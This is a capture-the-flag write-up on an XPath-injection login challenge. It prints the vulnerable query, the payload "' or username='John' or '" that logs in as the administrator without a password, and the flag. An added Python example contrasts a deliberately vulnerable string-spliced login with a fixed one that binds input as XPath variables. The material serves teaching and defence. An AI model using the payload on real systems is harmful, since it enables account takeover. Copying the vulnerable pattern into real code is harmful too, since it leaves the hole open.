XPath-injection-Authentication | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.


This is the query:

```
string(//user[username/text()='input' and password/text()='input']/account/text())
```

We can also see this table:

Members

| Username | Email | Account type |
| --- | --- | --- |
| Steve | steve@jobs.com | subscriber |
| John | John@doe.org | administrator |
| Eric | ric@ard.biz | subscriber |

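John is the administrator, so we'll give this payload as the username: `' or username='John' or '`. The `or username='John'` term makes the predicate true for John's node no matter what the password is. The full submitted parameters will be:

```
username=' or username='John' or '&password=a
```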


Flag: J41m3Qu4nD54Tr0nc
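
Why the payload works, and how binding input as XPath variables stops it, as an added example that is not part of the original writeup or the challenge's code. It assumes Python with lxml; the XML layout and the passwords are constructed for illustration, and `login_concat` and `login_bound` are hypothetical names.

```python
from lxml import etree

# Constructed sample data: usernames and account types follow the members
# table above; the passwords are placeholders invented for this example.
USERS_XML = b"""<users>
  <user><username>Steve</username><password>pw-steve</password><account>subscriber</account></user>
  <user><username>John</username><password>pw-john</password><account>administrator</account></user>
  <user><username>Eric</username><password>pw-eric</password><account>subscriber</account></user>
</users>"""
DOC = etree.fromstring(USERS_XML)


def login_concat(username, password):
    """Vulnerable: input is spliced into the XPath text, as in the query above."""
    query = ("string(//user[username/text()='%s' and password/text()='%s']"
             "/account/text())" % (username, password))
    return DOC.xpath(query)


# Hardened: the expression is compiled once and never changes. Input is bound
# to XPath variables, so quotes in it are compared as data, not parsed.
_LOGIN = etree.XPath(
    "string(//user[username/text()=$u and password/text()=$p]/account/text())")


def login_bound(username, password):
    """Same lookup with the credentials passed as XPath variables."""
    return _LOGIN(DOC, u=username, p=password)


if __name__ == "__main__":
    payload = "' or username='John' or '"  # payload from the writeup
    # 'and' binds tighter than 'or', so the spliced predicate reads
    #   username/text()='' or username='John' or ('' and password/text()='a')
    # and the middle term alone selects John's node.
    print(repr(login_concat(payload, "a")))       # account type leaks
    print(repr(login_bound(payload, "a")))        # no user has that name
    print(repr(login_bound("John", "pw-john")))   # legitimate login still works
```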